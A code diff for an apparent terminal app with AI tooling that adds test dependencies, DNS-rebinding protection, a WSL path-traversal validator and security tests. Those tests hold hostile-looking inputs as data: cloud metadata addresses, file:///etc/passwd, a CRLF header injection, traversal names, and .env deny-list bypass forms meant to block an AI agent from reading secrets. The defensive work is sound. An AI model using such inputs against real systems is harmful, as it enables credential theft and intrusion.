     resolution: {integrity: sha512-7W5Efjhsc3chVdFhqtaU0KtK32J37Zcr9RKtID54nG+tIpcY79CQK/veYPODxtD/LJ4Lue66jvrQzIX2Z2/pUQ==}
@@ -4187,6 +4430,42 @@ packages:
   vfile@6.0.3:
     resolution: {integrity: sha512-KzIbH/9tXat2u30jf+smMwFCsno4wHVdNmzFyL+T/L3UGqqk6JKfVqOFOZEpZSHADH1k40ab6NUIXZq422ov3Q==}
 
+  vite-node@2.1.9:
+    resolution: {integrity: sha512-AM9aQ/IPrW/6ENLQg3AGY4K1N2TGZdR5e4gu/MmmR2xR3Ll1+dib+nook92g4TV3PXVyeyxdWwtaCAiUL0hMxA==}
+    engines: {node: ^18.0.0 || >=20.0.0}
+    hasBin: true
+
+  vite@5.4.21:
+    resolution: {integrity: sha512-o5a9xKjbtuhY6Bi5S3+HvbRERmouabWbyUcpXXUA1u+GNUKoROi9byOJ8M0nHbHYHkYICiMlqxkg1KkYmm25Sw==}
+    engines: {node: ^18.0.0 || >=20.0.0}
+    hasBin: true
+    peerDependencies:
+      '@types/node': ^18.0.0 || >=20.0.0
+      less: '*'
+      lightningcss: ^1.21.0
+      sass: '*'
+      sass-embedded: '*'
+      stylus: '*'
+      sugarss: '*'
+      terser: ^5.4.0
+    peerDependenciesMeta:
+      '@types/node':
+        optional: true
+      less:
+        optional: true
+      lightningcss:
+        optional: true
+      sass:
+        optional: true
+      sass-embedded:
+        optional: true
+      stylus:
+        optional: true
+      sugarss:
+        optional: true
+      terser:
+        optional: true
+
   vite@7.3.2:
     resolution: {integrity: sha512-Bby3NOsna2jsjfLVOHKes8sGwgl4TT0E6vvpYgnAYDIF/tie7MRaFthmKuHx1NSXjiTueXH3do80FMQgvEktRg==}
     engines: {node: ^20.19.0 || >=22.12.0}
@@ -4227,6 +4506,31 @@ packages:
       yaml:
         optional: true
 
+  vitest@2.1.9:
+    resolution: {integrity: sha512-MSmPM9REYqDGBI8439mA4mWhV5sKmDlBKWIYbA3lRb2PTHACE0mgKwA8yQ2xq9vxDTuk4iPrECBAEW2aoFXY0Q==}
+    engines: {node: ^18.0.0 || >=20.0.0}
+    hasBin: true
+    peerDependencies:
+      '@edge-runtime/vm': '*'
+      '@types/node': ^18.0.0 || >=20.0.0
+      '@vitest/browser': 2.1.9
+      '@vitest/ui': 2.1.9
+      happy-dom: '*'
+      jsdom: '*'
+    peerDependenciesMeta:
+      '@edge-runtime/vm':
+        optional: true
+      '@types/node':
+        optional: true
+      '@vitest/browser':
+        optional: true
+      '@vitest/ui':
+        optional: true
+      happy-dom:
+        optional: true
+      jsdom:
+        optional: true
+
   vscode-jsonrpc@8.2.0:
     resolution: {integrity: sha512-C+r0eKJUIfiDIfwJhria30+TYWPtuHJXHtI7J0YlOmKAo7ogxP20T0zxB7HZQIFhIyvoBPwWskjxrvAtfjyZfA==}
     engines: {node: '>=14.0.0'}
@@ -4265,6 +4569,11 @@ packages:
   which@4.0.0:
     resolution: {integrity: sha512-GlaYyEb07DPxYCKhKzplCWBJtvxZcZMrL+4UkrTSJHHPyZU4mYYTv3qaOe77H7EODLSSopAUFAc6W8U4yqvscg==}
     engines: {node: ^16.13.0 || >=18.0.0}
+    hasBin: true
+
+  why-is-node-running@2.3.0:
+    resolution: {integrity: sha512-hUrmaWBdVDcxvYqnyh09zunKzROWjbZTiNy8dBEjkS7ehEDQibXJ7XvlmtbwuTclUiIyN+CyXQD4Vmko8fNm8w==}
+    engines: {node: '>=8'}
     hasBin: true
 
   wrap-ansi@7.0.0:
@@ -4800,52 +5109,103 @@ snapshots:
     dependencies:
       '@noble/ciphers': 1.3.0
 
+  '@esbuild/aix-ppc64@0.21.5':
+    optional: true
+
   '@esbuild/aix-ppc64@0.27.7':
+    optional: true
+
+  '@esbuild/android-arm64@0.21.5':
     optional: true
 
   '@esbuild/android-arm64@0.27.7':
     optional: true
 
+  '@esbuild/android-arm@0.21.5':
+    optional: true
+
   '@esbuild/android-arm@0.27.7':
+    optional: true
+
+  '@esbuild/android-x64@0.21.5':
     optional: true
 
   '@esbuild/android-x64@0.27.7':
     optional: true
 
+  '@esbuild/darwin-arm64@0.21.5':
+    optional: true
+
   '@esbuild/darwin-arm64@0.27.7':
+    optional: true
+
+  '@esbuild/darwin-x64@0.21.5':
     optional: true
 
   '@esbuild/darwin-x64@0.27.7':
     optional: true
 
+  '@esbuild/freebsd-arm64@0.21.5':
+    optional: true
+
   '@esbuild/freebsd-arm64@0.27.7':
+    optional: true
+
+  '@esbuild/freebsd-x64@0.21.5':
     optional: true
 
   '@esbuild/freebsd-x64@0.27.7':
     optional: true
 
+  '@esbuild/linux-arm64@0.21.5':
+    optional: true
+
   '@esbuild/linux-arm64@0.27.7':
+    optional: true
+
+  '@esbuild/linux-arm@0.21.5':
     optional: true
 
   '@esbuild/linux-arm@0.27.7':
     optional: true
 
+  '@esbuild/linux-ia32@0.21.5':
+    optional: true
+
   '@esbuild/linux-ia32@0.27.7':
+    optional: true
+
+  '@esbuild/linux-loong64@0.21.5':
     optional: true
 
   '@esbuild/linux-loong64@0.27.7':
     optional: true
 
+  '@esbuild/linux-mips64el@0.21.5':
+    optional: true
+
   '@esbuild/linux-mips64el@0.27.7':
+    optional: true
+
+  '@esbuild/linux-ppc64@0.21.5':
     optional: true
 
   '@esbuild/linux-ppc64@0.27.7':
     optional: true
 
+  '@esbuild/linux-riscv64@0.21.5':
+    optional: true
+
   '@esbuild/linux-riscv64@0.27.7':
     optional: true
 
+  '@esbuild/linux-s390x@0.21.5':
+    optional: true
+
   '@esbuild/linux-s390x@0.27.7':
+    optional: true
+
+  '@esbuild/linux-x64@0.21.5':
     optional: true
 
   '@esbuild/linux-x64@0.27.7':
@@ -4854,10 +5214,16 @@ snapshots:
   '@esbuild/netbsd-arm64@0.27.7':
     optional: true
 
+  '@esbuild/netbsd-x64@0.21.5':
+    optional: true
+
   '@esbuild/netbsd-x64@0.27.7':
     optional: true
 
   '@esbuild/openbsd-arm64@0.27.7':
+    optional: true
+
+  '@esbuild/openbsd-x64@0.21.5':
     optional: true
 
   '@esbuild/openbsd-x64@0.27.7':
@@ -4866,13 +5232,25 @@ snapshots:
   '@esbuild/openharmony-arm64@0.27.7':
     optional: true
 
+  '@esbuild/sunos-x64@0.21.5':
+    optional: true
+
   '@esbuild/sunos-x64@0.27.7':
+    optional: true
+
+  '@esbuild/win32-arm64@0.21.5':
     optional: true
 
   '@esbuild/win32-arm64@0.27.7':
     optional: true
 
+  '@esbuild/win32-ia32@0.21.5':
+    optional: true
+
   '@esbuild/win32-ia32@0.27.7':
+    optional: true
+
+  '@esbuild/win32-x64@0.21.5':
     optional: true
 
   '@esbuild/win32-x64@0.27.7':
@@ -6405,6 +6783,47 @@ snapshots:
     transitivePeerDependencies:
       - supports-color
 
+  '@vitest/expect@2.1.9':
+    dependencies:
+      '@vitest/spy': 2.1.9
+      '@vitest/utils': 2.1.9
+      chai: 5.3.3
+      tinyrainbow: 1.2.0
+
+  '@vitest/mocker@2.1.9(msw@2.13.4(@types/node@25.6.0)(typescript@5.8.3))(vite@5.4.21(@types/node@25.6.0)(lightningcss@1.32.0))':
+    dependencies:
+      '@vitest/spy': 2.1.9
+      estree-walker: 3.0.3
+      magic-string: 0.30.21
+    optionalDependencies:
+      msw: 2.13.4(@types/node@25.6.0)(typescript@5.8.3)
+      vite: 5.4.21(@types/node@25.6.0)(lightningcss@1.32.0)
+
+  '@vitest/pretty-format@2.1.9':
+    dependencies:
+      tinyrainbow: 1.2.0
+
+  '@vitest/runner@2.1.9':
+    dependencies:
+      '@vitest/utils': 2.1.9
+      pathe: 1.1.2
+
+  '@vitest/snapshot@2.1.9':
+    dependencies:
+      '@vitest/pretty-format': 2.1.9
+      magic-string: 0.30.21
+      pathe: 1.1.2
+
+  '@vitest/spy@2.1.9':
+    dependencies:
+      tinyspy: 3.0.2
+
+  '@vitest/utils@2.1.9':
+    dependencies:
+      '@vitest/pretty-format': 2.1.9
+      loupe: 3.2.1
+      tinyrainbow: 1.2.0
+
   '@xterm/addon-fit@0.11.0': {}
 
   '@xterm/addon-search@0.16.0': {}
@@ -6459,6 +6878,8 @@ snapshots:
     dependencies:
       tslib: 2.8.1
 
+  assertion-error@2.0.1: {}
+
   ast-types@0.16.1:
     dependencies:
       tslib: 2.8.1
@@ -6505,6 +6926,8 @@ snapshots:
 
   bytes@3.1.2: {}
 
+  cac@6.7.14: {}
+
   call-bind-apply-helpers@1.0.2:
     dependencies:
       es-errors: 1.3.0
@@ -6521,6 +6944,14 @@ snapshots:
 
   ccount@2.0.1: {}
 
+  chai@5.3.3:
+    dependencies:
+      assertion-error: 2.0.1
+      check-error: 2.1.3
+      deep-eql: 5.0.2
+      loupe: 3.2.1
+      pathval: 2.0.1
+
   chalk@5.6.2: {}
 
   character-entities-html4@2.1.0: {}
@@ -6530,6 +6961,8 @@ snapshots:
   character-entities@2.0.2: {}
 
   character-reference-invalid@2.0.1: {}
+
+  check-error@2.1.3: {}
 
   chevrotain-allstar@0.4.1(chevrotain@12.0.0):
     dependencies:
@@ -6850,6 +7283,8 @@ snapshots:
 
   dedent@1.7.2: {}
 
+  deep-eql@5.0.2: {}
+
   deepmerge@4.3.1: {}
 
   default-browser-id@5.0.1: {}
@@ -6925,9 +7360,37 @@ snapshots:
 
   es-errors@1.3.0: {}
 
+  es-module-lexer@1.7.0: {}
+
   es-object-atoms@1.1.1:
     dependencies:
       es-errors: 1.3.0
+
+  esbuild@0.21.5:
+    optionalDependencies:
+      '@esbuild/aix-ppc64': 0.21.5
+      '@esbuild/android-arm': 0.21.5
+      '@esbuild/android-arm64': 0.21.5
+      '@esbuild/android-x64': 0.21.5
+      '@esbuild/darwin-arm64': 0.21.5
+      '@esbuild/darwin-x64': 0.21.5
+      '@esbuild/freebsd-arm64': 0.21.5
+      '@esbuild/freebsd-x64': 0.21.5
+      '@esbuild/linux-arm': 0.21.5
+      '@esbuild/linux-arm64': 0.21.5
+      '@esbuild/linux-ia32': 0.21.5
+      '@esbuild/linux-loong64': 0.21.5
+      '@esbuild/linux-mips64el': 0.21.5
+      '@esbuild/linux-ppc64': 0.21.5
+      '@esbuild/linux-riscv64': 0.21.5
+      '@esbuild/linux-s390x': 0.21.5
+      '@esbuild/linux-x64': 0.21.5
+      '@esbuild/netbsd-x64': 0.21.5
+      '@esbuild/openbsd-x64': 0.21.5
+      '@esbuild/sunos-x64': 0.21.5
+      '@esbuild/win32-arm64': 0.21.5
+      '@esbuild/win32-ia32': 0.21.5
+      '@esbuild/win32-x64': 0.21.5
 
   esbuild@0.27.7:
     optionalDependencies:
@@ -6968,6 +7431,10 @@ snapshots:
 
   estree-util-is-identifier-name@3.0.0: {}
 
+  estree-walker@3.0.3:
+    dependencies:
+      '@types/estree': 1.0.8
+
   etag@1.8.1: {}
 
   eventsource-parser@3.0.8: {}
@@ -7002,6 +7469,8 @@ snapshots:
       signal-exit: 4.1.0
       strip-final-newline: 4.0.0
       yoctocolors: 2.1.2
+
+  expect-type@1.3.0: {}
 
   express-rate-limit@8.3.2(express@5.2.1):
     dependencies:
@@ -7485,6 +7954,8 @@ snapshots:
       is-unicode-supported: 1.3.0
 
   longest-streak@3.1.0: {}
+
+  loupe@3.2.1: {}
 
   lru-cache@5.1.1:
     dependencies:
@@ -8060,7 +8531,11 @@ snapshots:
 
   path-to-regexp@8.4.2: {}
 
+  pathe@1.1.2: {}
+
   pathe@2.0.3: {}
+
+  pathval@2.0.1: {}
 
   picocolors@1.1.1: {}
 
@@ -8475,6 +8950,8 @@ snapshots:
       side-channel-map: 1.0.1
       side-channel-weakmap: 1.0.2
 
+  siginfo@2.0.0: {}
+
   signal-exit@3.0.7: {}
 
   signal-exit@4.1.0: {}
@@ -8487,7 +8964,11 @@ snapshots:
 
   space-separated-tokens@2.0.2: {}
 
+  stackback@0.0.2: {}
+
   statuses@2.0.2: {}
+
+  std-env@3.10.0: {}
 
   stdin-discarder@0.2.2: {}
 
@@ -8583,12 +9064,22 @@ snapshots:
 
   tiny-invariant@1.3.3: {}
 
+  tinybench@2.9.0: {}
+
+  tinyexec@0.3.2: {}
+
   tinyexec@1.1.1: {}
 
   tinyglobby@0.2.16:
     dependencies:
       fdir: 6.5.0(picomatch@4.0.4)
       picomatch: 4.0.4
+
+  tinypool@1.1.1: {}
+
+  tinyrainbow@1.2.0: {}
+
+  tinyspy@3.0.2: {}
 
   tldts-core@7.0.28: {}
 
@@ -8743,6 +9234,34 @@ snapshots:
       '@types/unist': 3.0.3
       vfile-message: 4.0.3
 
+  vite-node@2.1.9(@types/node@25.6.0)(lightningcss@1.32.0):
+    dependencies:
+      cac: 6.7.14
+      debug: 4.4.3
+      es-module-lexer: 1.7.0
+      pathe: 1.1.2
+      vite: 5.4.21(@types/node@25.6.0)(lightningcss@1.32.0)
+    transitivePeerDependencies:
+      - '@types/node'
+      - less
+      - lightningcss
+      - sass
+      - sass-embedded
+      - stylus
+      - sugarss
+      - supports-color
+      - terser
+
+  vite@5.4.21(@types/node@25.6.0)(lightningcss@1.32.0):
+    dependencies:
+      esbuild: 0.21.5
+      postcss: 8.5.10
+      rollup: 4.60.2
+    optionalDependencies:
+      '@types/node': 25.6.0
+      fsevents: 2.3.3
+      lightningcss: 1.32.0
+
   vite@7.3.2(@types/node@25.6.0)(jiti@2.6.1)(lightningcss@1.32.0):
     dependencies:
       esbuild: 0.27.7
@@ -8756,6 +9275,41 @@ snapshots:
       fsevents: 2.3.3
       jiti: 2.6.1
       lightningcss: 1.32.0
+
+  vitest@2.1.9(@types/node@25.6.0)(lightningcss@1.32.0)(msw@2.13.4(@types/node@25.6.0)(typescript@5.8.3)):
+    dependencies:
+      '@vitest/expect': 2.1.9
+      '@vitest/mocker': 2.1.9(msw@2.13.4(@types/node@25.6.0)(typescript@5.8.3))(vite@5.4.21(@types/node@25.6.0)(lightningcss@1.32.0))
+      '@vitest/pretty-format': 2.1.9
+      '@vitest/runner': 2.1.9
+      '@vitest/snapshot': 2.1.9
+      '@vitest/spy': 2.1.9
+      '@vitest/utils': 2.1.9
+      chai: 5.3.3
+      debug: 4.4.3
+      expect-type: 1.3.0
+      magic-string: 0.30.21
+      pathe: 1.1.2
+      std-env: 3.10.0
+      tinybench: 2.9.0
+      tinyexec: 0.3.2
+      tinypool: 1.1.1
+      tinyrainbow: 1.2.0
+      vite: 5.4.21(@types/node@25.6.0)(lightningcss@1.32.0)
+      vite-node: 2.1.9(@types/node@25.6.0)(lightningcss@1.32.0)
+      why-is-node-running: 2.3.0
+    optionalDependencies:
+      '@types/node': 25.6.0
+    transitivePeerDependencies:
+      - less
+      - lightningcss
+      - msw
+      - sass
+      - sass-embedded
+      - stylus
+      - sugarss
+      - supports-color
+      - terser
 
   vscode-jsonrpc@8.2.0: {}
 
@@ -8787,6 +9341,11 @@ snapshots:
   which@4.0.0:
     dependencies:
       isexe: 3.1.5
+
+  why-is-node-running@2.3.0:
+    dependencies:
+      siginfo: 2.0.0
+      stackback: 0.0.2
 
   wrap-ansi@7.0.0:
     dependencies:

--- a/src-tauri/src/modules/net.rs
+++ b/src-tauri/src/modules/net.rs
@@ -1,5 +1,5 @@
 use std::collections::HashMap;
-use std::net::IpAddr;
+use std::net::{IpAddr, SocketAddr};
 use std::time::Duration;
 
 use bytes::Bytes;
@@ -82,14 +82,17 @@ enum IpKind {
     BlockedMetadata,
 }
 
-async fn classify_host(host: &str) -> Result<IpKind, String> {
+/// Resolve `host` once and return both its safety classification and the
+/// concrete IPs we resolved. Callers can pin reqwest to these IPs to defeat
+/// DNS rebinding (where a second lookup returns a different address).
+async fn resolve_and_classify(host: &str) -> Result<(IpKind, Vec<IpAddr>), String> {
     // Direct literal? Skip DNS.
     if let Ok(ip) = host.parse::<IpAddr>() {
-        return Ok(ip_kind(ip));
+        return Ok((ip_kind(ip), vec![ip]));
     }
-    let host = host.to_string();
+    let host_owned = host.to_string();
     let lookup = tokio::task::spawn_blocking(move || {
-        (host.as_str(), 0u16)
+        (host_owned.as_str(), 0u16)
             .to_socket_addrs()
             .map(|it| it.map(|a| a.ip()).collect::<Vec<_>>())
     })
@@ -100,8 +103,8 @@ async fn classify_host(host: &str) -> Result<IpKind, String> {
         return Err("dns: no addresses".into());
     }
     let mut worst = IpKind::Public;
-    for ip in lookup {
-        let k = ip_kind(ip);
+    for ip in &lookup {
+        let k = ip_kind(*ip);
         worst = match (worst, k) {
             (_, IpKind::BlockedMetadata) => IpKind::BlockedMetadata,
             (IpKind::BlockedMetadata, _) => IpKind::BlockedMetadata,
@@ -110,7 +113,7 @@ async fn classify_host(host: &str) -> Result<IpKind, String> {
             (a, _) => a,
         };
     }
-    Ok(worst)
+    Ok((worst, lookup))
 }
 
 use std::net::ToSocketAddrs;
@@ -135,19 +138,35 @@ fn validate_url(url: &str, allow_private: bool) -> Result<reqwest::Url, String> 
     Ok(parsed)
 }
 
-async fn enforce_host_policy(parsed: &reqwest::Url, allow_private: bool) -> Result<(), String> {
-    let host = parsed
-        .host_str()
-        .ok_or_else(|| "missing host".to_string())?;
-    match classify_host(host).await? {
-        IpKind::BlockedMetadata => Err(format!("host not allowed: {host}")),
+/// Classify the host AND return safe IPs to pin reqwest's resolver to.
+/// Defeats DNS rebinding (second-lookup-returns-different-IP) by reusing
+/// exactly the addresses that passed `ip_kind`.
+async fn classify_and_collect_safe_ips(
+    host: &str,
+    allow_private: bool,
+) -> Result<Vec<IpAddr>, String> {
+    let (worst, ips) = resolve_and_classify(host).await?;
+    match worst {
+        IpKind::BlockedMetadata => return Err(format!("host not allowed: {host}")),
         IpKind::Loopback | IpKind::Private if !allow_private => {
-            Err(format!(
+            return Err(format!(
                 "host {host} resolves to a private/loopback address; this endpoint requires explicit opt-in",
-            ))
+            ));
         }
-        _ => Ok(()),
+        _ => {}
     }
+    let safe: Vec<IpAddr> = ips
+        .into_iter()
+        .filter(|ip| match ip_kind(*ip) {
+            IpKind::BlockedMetadata => false,
+            IpKind::Loopback | IpKind::Private => allow_private,
+            IpKind::Public => true,
+        })
+        .collect();
+    if safe.is_empty() {
+        return Err(format!("host {host}: no safe IPs"));
+    }
+    Ok(safe)
 }
 
 fn sanitize_headers(headers: Option<HashMap<String, String>>) -> Result<HeaderMap, String> {
@@ -177,13 +196,18 @@ pub async fn lm_ping(base_url: String) -> Result<u16, String> {
     }
     let probe = format!("{trimmed}/models");
     let parsed = validate_url(&probe, true)?;
-    enforce_host_policy(&parsed, true).await?;
+    let host = parsed
+        .host_str()
+        .ok_or_else(|| "missing host".to_string())?
+        .to_string();
+    let safe_ips = classify_and_collect_safe_ips(&host, true).await?;
 
-    let client = reqwest::Client::builder()
+    let mut builder = reqwest::Client::builder()
         .timeout(Duration::from_secs(5))
-        .redirect(reqwest::redirect::Policy::none())
-        .build()
-        .map_err(|e| e.to_string())?;
+        .redirect(reqwest::redirect::Policy::none());
+    let addrs: Vec<SocketAddr> = safe_ips.iter().map(|ip| SocketAddr::new(*ip, 0)).collect();
+    builder = builder.resolve_to_addrs(&host, &addrs);
+    let client = builder.build().map_err(|e| e.to_string())?;
     client
         .get(parsed)
         .send()
@@ -219,9 +243,24 @@ fn build_request(
     Ok(req)
 }
 
-fn build_safe_client(allow_private: bool) -> Result<reqwest::Client, String> {
-    reqwest::Client::builder()
-        .connect_timeout(Duration::from_secs(10))
+fn build_safe_client(
+    allow_private: bool,
+    pinned: &[(String, Vec<IpAddr>)],
+) -> Result<reqwest::Client, String> {
+    let mut builder = reqwest::Client::builder()
+        .connect_timeout(Duration::from_secs(10));
+    // Pin reqwest's resolver to the IPs we just classified. Without this,
+    // reqwest's own DNS lookup could return a different (private/metadata) IP
+    // for the same hostname between classify and connect — classic DNS
+    // rebinding attack. We pin port 0 because reqwest fills in the actual
+    // port from the URL when wiring up the override map.
+    for (host, ips) in pinned {
+        let addrs: Vec<SocketAddr> = ips.iter().map(|ip| SocketAddr::new(*ip, 0)).collect();
+        if !addrs.is_empty() {
+            builder = builder.resolve_to_addrs(host, &addrs);
+        }
+    }
+    builder
         .redirect(reqwest::redirect::Policy::custom(move |attempt| {
             if attempt.previous().len() > 10 {
                 return attempt.error("too many redirects");
@@ -281,9 +320,13 @@ pub async fn ai_http_request(
 ) -> Result<HttpResponse, String> {
     let allow_private = allow_private_network.unwrap_or(false);
     let parsed = validate_url(&url, allow_private)?;
-    enforce_host_policy(&parsed, allow_private).await?;
+    let host = parsed
+        .host_str()
+        .ok_or_else(|| "missing host".to_string())?
+        .to_string();
+    let safe_ips = classify_and_collect_safe_ips(&host, allow_private).await?;
 
-    let client = build_safe_client(allow_private)?;
+    let client = build_safe_client(allow_private, &[(host, safe_ips)])?;
 
     let req = build_request(&client, &method, parsed, headers, body)?;
     let resp = req.send().await.map_err(|e| e.to_string())?;
@@ -331,12 +374,23 @@ pub async fn ai_http_stream(
             return Err(e);
         }
     };
-    if let Err(e) = enforce_host_policy(&parsed, allow_private).await {
-        let _ = on_event.send(AiStreamEvent::Error { message: e.clone() });
-        return Err(e);
-    }
+    let host = match parsed.host_str() {
+        Some(h) => h.to_string(),
+        None => {
+            let e = "missing host".to_string();
+            let _ = on_event.send(AiStreamEvent::Error { message: e.clone() });
+            return Err(e);
+        }
+    };
+    let safe_ips = match classify_and_collect_safe_ips(&host, allow_private).await {
+        Ok(v) => v,
+        Err(e) => {
+            let _ = on_event.send(AiStreamEvent::Error { message: e.clone() });
+            return Err(e);
+        }
+    };
 
-    let client = build_safe_client(allow_private)?;
+    let client = build_safe_client(allow_private, &[(host, safe_ips)])?;
 
     let req = build_request(&client, &method, parsed, headers, body)?;
     let resp = match req.send().await {
@@ -379,4 +433,117 @@ pub async fn ai_http_stream(
 
     let _ = on_event.send(AiStreamEvent::End);
     Ok(())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::net::Ipv4Addr;
+
+    #[test]
+    fn metadata_ips_classified_as_blocked() {
+        // AWS / Google / Azure all share the IPv4 169.254.169.254 link-local.
+        assert_eq!(
+            ip_kind(IpAddr::V4(Ipv4Addr::new(169, 254, 169, 254))),
+            IpKind::BlockedMetadata
+        );
+        // AWS IPv6 metadata
+        assert_eq!(
+            ip_kind("fd00:ec2::254".parse().unwrap()),
+            IpKind::BlockedMetadata
+        );
+        // Any link-local IPv4 (169.254/16) — same network range, still blocked.
+        assert_eq!(
+            ip_kind(IpAddr::V4(Ipv4Addr::new(169, 254, 1, 1))),
+            IpKind::BlockedMetadata
+        );
+        // IPv6 link-local fe80::/10
+        assert_eq!(
+            ip_kind("fe80::1".parse().unwrap()),
+            IpKind::BlockedMetadata
+        );
+    }
+
+    #[test]
+    fn private_ips_classified_correctly() {
+        assert_eq!(
+            ip_kind(IpAddr::V4(Ipv4Addr::new(10, 0, 0, 1))),
+            IpKind::Private
+        );
+        assert_eq!(
+            ip_kind(IpAddr::V4(Ipv4Addr::new(172, 16, 0, 1))),
+            IpKind::Private
+        );
+        assert_eq!(
+            ip_kind(IpAddr::V4(Ipv4Addr::new(192, 168, 1, 1))),
+            IpKind::Private
+        );
+        // CGNAT 100.64/10
+        assert_eq!(
+            ip_kind(IpAddr::V4(Ipv4Addr::new(100, 64, 0, 1))),
+            IpKind::Private
+        );
+    }
+
+    #[test]
+    fn loopback_classified_as_loopback() {
+        assert_eq!(
+            ip_kind(IpAddr::V4(Ipv4Addr::new(127, 0, 0, 1))),
+            IpKind::Loopback
+        );
+        assert_eq!(ip_kind("::1".parse().unwrap()), IpKind::Loopback);
+    }
+
+    #[test]
+    fn public_ips_classified_as_public() {
+        assert_eq!(
+            ip_kind(IpAddr::V4(Ipv4Addr::new(8, 8, 8, 8))),
+            IpKind::Public
+        );
+        assert_eq!(
+            ip_kind(IpAddr::V4(Ipv4Addr::new(1, 1, 1, 1))),
+            IpKind::Public
+        );
+    }
+
+    #[test]
+    fn validate_url_blocks_userinfo_and_metadata_hostnames() {
+        // URLs with userinfo can confuse browsers / leak creds in redirects.
+        assert!(validate_url("http://user:pass@example.com/", true).is_err());
+        // Cloud metadata-by-name.
+        assert!(validate_url("http://metadata.google.internal/", true).is_err());
+        assert!(validate_url("http://metadata/", true).is_err());
+        assert!(validate_url("http://metadata.azure.com/", true).is_err());
+    }
+
+    #[test]
+    fn validate_url_rejects_non_http_schemes() {
+        assert!(validate_url("ftp://example.com/", true).is_err());
+        assert!(validate_url("file:///etc/passwd", true).is_err());
+        assert!(validate_url("javascript:alert(1)", true).is_err());
+    }
+
+    #[test]
+    fn sanitize_headers_blocks_crlf_injection() {
+        let mut h = HashMap::new();
+        h.insert("X-Foo".to_string(), "bar\r\nX-Evil: yes".to_string());
+        assert!(sanitize_headers(Some(h)).is_err());
+    }
+
+    #[test]
+    fn sanitize_headers_blocks_hop_by_hop_headers() {
+        for hop in [
+            "host",
+            "content-length",
+            "connection",
+            "proxy-authorization",
+        ] {
+            let mut h = HashMap::new();
+            h.insert(hop.to_string(), "value".to_string());
+            assert!(
+                sanitize_headers(Some(h)).is_err(),
+                "expected {hop} to be rejected"
+            );
+        }
+    }
 }

--- a/src-tauri/src/modules/workspace.rs
+++ b/src-tauri/src/modules/workspace.rs
@@ -42,8 +42,34 @@ pub fn resolve_path(path: &str, _workspace: &WorkspaceEnv) -> PathBuf {
     PathBuf::from(path)
 }
 
+/// True for WSL distro names safe to splice into a UNC path. Real WSL distros
+/// are alphanumeric with `.`, `_`, `-` separators (e.g. `Ubuntu-22.04`). Reject
+/// anything that could traverse out of the `\\wsl.localhost\<distro>\` prefix
+/// (`..`, `\`, `/`, `:`, `?`, `*`, control bytes) or empty names.
+#[cfg(windows)]
+fn is_safe_distro_name(name: &str) -> bool {
+    if name.is_empty() || name.len() > 255 {
+        return false;
+    }
+    if name == "." || name == ".." || name.starts_with('.') {
+        return false;
+    }
+    name.chars()
+        .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-' | ' '))
+        && !name.contains("..")
+}
+
 #[cfg(windows)]
 pub fn wsl_path_to_unc(distro: &str, path: &str) -> PathBuf {
+    // Defense-in-depth: refuse to construct a UNC path with a distro name that
+    // could escape the WSL share root via `..`, `\`, or other path metachars.
+    // Returns a clearly-invalid path that downstream `is_dir()`/`metadata()`
+    // checks will reject. The webview's distro list comes from `wsl.exe --list`
+    // and is normally trustworthy, but a locally-registered malicious distro
+    // can name itself with traversal characters; this filter blocks that.
+    if !is_safe_distro_name(distro) {
+        return PathBuf::from(r"\\wsl.localhost\__terax_invalid_distro__");
+    }
     let normalized = path.replace('\\', "/");
     let trimmed = normalized.trim_start_matches('/');
     let primary = PathBuf::from(format!(
@@ -175,5 +201,56 @@ pub fn wsl_home(distro: String) -> Result<String, String> {
         } else {
             Ok(home)
         }
+    }
+}
+
+#[cfg(all(test, windows))]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn distro_validator_accepts_real_names() {
+        assert!(is_safe_distro_name("Ubuntu"));
+        assert!(is_safe_distro_name("Ubuntu-22.04"));
+        assert!(is_safe_distro_name("Debian"));
+        assert!(is_safe_distro_name("Alpine_3.18"));
+        assert!(is_safe_distro_name("openSUSE-Tumbleweed"));
+    }
+
+    #[test]
+    fn distro_validator_rejects_path_traversal() {
+        assert!(!is_safe_distro_name(".."));
+        assert!(!is_safe_distro_name("..\\..\\Windows"));
+        assert!(!is_safe_distro_name("../foo"));
+        assert!(!is_safe_distro_name("foo/bar"));
+        assert!(!is_safe_distro_name("foo\\bar"));
+        assert!(!is_safe_distro_name("foo..bar"));
+    }
+
+    #[test]
+    fn distro_validator_rejects_special_chars() {
+        assert!(!is_safe_distro_name("foo:bar"));
+        assert!(!is_safe_distro_name("foo?bar"));
+        assert!(!is_safe_distro_name("foo*bar"));
+        assert!(!is_safe_distro_name("foo\0bar"));
+        assert!(!is_safe_distro_name(""));
+        assert!(!is_safe_distro_name(".hidden"));
+    }
+
+    #[test]
+    fn wsl_path_to_unc_blocks_traversal_distro() {
+        // Malicious distro name must produce a path that is_dir() will reject,
+        // never escape the WSL share root.
+        let p = wsl_path_to_unc("..\\..\\..\\Windows", "/etc/passwd");
+        let s = p.to_string_lossy();
+        assert!(s.contains("__terax_invalid_distro__"), "got: {s}");
+        assert!(!s.contains("\\..\\"), "got: {s}");
+    }
+
+    #[test]
+    fn wsl_path_to_unc_accepts_valid_distro() {
+        let p = wsl_path_to_unc("Ubuntu", "/etc/hosts");
+        let s = p.to_string_lossy();
+        assert!(!s.contains("__terax_invalid_distro__"), "got: {s}");
     }
 }

--- a/src/modules/ai/lib/security.test.ts
+++ b/src/modules/ai/lib/security.test.ts
@@ -1,0 +1,211 @@
+import { describe, expect, it } from "vitest";
+import {
+  checkReadable,
+  checkReadableCanonical,
+  checkShellCommand,
+  checkWritable,
+} from "./security";
+
+describe("checkReadable — secret basenames", () => {
+  it("blocks plain .env", () => {
+    expect(checkReadable("/home/me/.env")).toMatchObject({ ok: false });
+  });
+
+  it("blocks .env.local and .env.production", () => {
+    expect(checkReadable("/home/me/.env.local")).toMatchObject({ ok: false });
+    expect(checkReadable("/home/me/.env.production")).toMatchObject({
+      ok: false,
+    });
+  });
+
+  it("blocks .env with trailing Windows-stripped characters", () => {
+    // Windows strips trailing dot/space at open time — so `.env.` and `.env `
+    // open the same file as `.env`. The pre-canonicalize deny-list must
+    // refuse these on its first pass.
+    expect(checkReadable("C:\\Users\\me\\.env.")).toMatchObject({ ok: false });
+    expect(checkReadable("C:\\Users\\me\\.env ")).toMatchObject({ ok: false });
+  });
+
+  it("blocks NTFS alternate-data-stream notation for .env", () => {
+    // `.env:hidden` and `.env::$DATA` access the same underlying file's
+    // default data stream — must not bypass the deny-list.
+    expect(checkReadable("C:\\Users\\me\\.env::$DATA")).toMatchObject({
+      ok: false,
+    });
